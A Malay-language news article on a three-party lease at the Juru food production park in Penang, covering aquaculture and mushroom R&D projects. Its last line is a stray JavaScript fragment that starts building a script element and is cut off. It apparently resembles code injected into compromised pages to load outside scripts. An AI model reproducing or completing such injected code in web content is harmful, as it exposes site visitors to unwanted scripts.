Pajakan tiga pihak harap tingkat hasil TKPM

Admin

O l e h : ZAINULFAQAR YAACOB

GEORGE TOWN – Exco Pertanian & Industri Asas Tani, Pembangunan Desa dan Kesihatan, Dr. Afif Bahardin berharap pajakan tiga pihak di Taman Kekal Pengeluaran Makanan (TKPM) dekat Juru, dalam kawasan Dewan Undangan Negeri (DUN) Bukit Tengah akan meningkatkan lagi hasil pertanian negeri untuk pemakanan.

“Memandangkan projek TKPM ini amat penting dalam usaha Kerajaan Negeri meningkatkan hasil pengeluaran pertanian negeri untuk pemakanan, CMI telah berusaha untuk memenuhi kekosongan tapak di kawasan projek ini,” ujarnya yang juga Ahli Dewan Undangan Negeri (ADUN) Seberang Jaya pada Majlis Menandatangani Perjanjian Pajakan TKPM di sini baru-baru ini.

Perjanjian berkaitan adalah antara Kerajaan Negeri diwakili Pengurus Besar Perbadanan Ketua Menteri Pulau Pinang (CMI), S. Bharathi dengan tiga pengusaha, iaitu Pengarah Syarikat Gourmet One Food Services (M) Sdn. Bhd., Farizul Arif Abd. Mutalib, Boey Kang Nin (Pengarah Syarikat EKO Aquaculture Sdn. Bhd.) dan Boey Tze
Nin (Pengarah Syarikat EKO Agro Biotech Sdn. Bhd.).

Timbalan Setiausaha (Pembangunan) Kerajaan Negeri merangkap Pengarah Unit Perancang Ekonomi Negeri (UPEN), Datuk Abu Jamal Nordin turut menyaksikan majlis pemeteraian perjanjian pajakan tersebut.

Difahamkan, Syarikat Gourmet One Food Services (M) Sdn. Bhd. pernah memeterai satu perjanjian pajakan dengan CMI selaku pengurus tapak TKPM pada tahun 2013, untuk mengusahakan projek pembenihan ikan dan udang marin.

Syarikat tersebut mendapat tambahan tapak seluas dua ekar lagi pada perjanjian pajakan kali ini dengan keseluruhan kawasan
usahawan adalah kira-kira lima ekar.

Manakala, pajakan oleh Syarikat EKO Aquaculture Sdn. Bhd. adalah bertujuan untuk menjalankan projek penyelidikan serta pembangunan (R&D) bagi pembenihan ikan dan udang dengan menggunakan sistem moden ‘Bio Floc’.

Syarikat EKO Agro Biotech Sdn. Bhd. pula menjalankan projek usahawan tani muda serta R&D cendawan dan memasarkan produk komersial yang dikenali sebagai “mushgrow”.

TKPM dicadangkan dalam Pelan Pembangunan Pertanian Rancangan Malaysia Ke-9 (RMK-9) pada tahun 2005 demi memenuhi keperluan makanan domestik serta eksport ke luar negeri.

Sehingga kini, terdapat lapan pengusaha zon pertanian, pengusaha zon penternakan (1) dan pengusaha zon perikanan (3) bagi
TKPM Juru.

var d=document;var s=d.createElement(‘script’);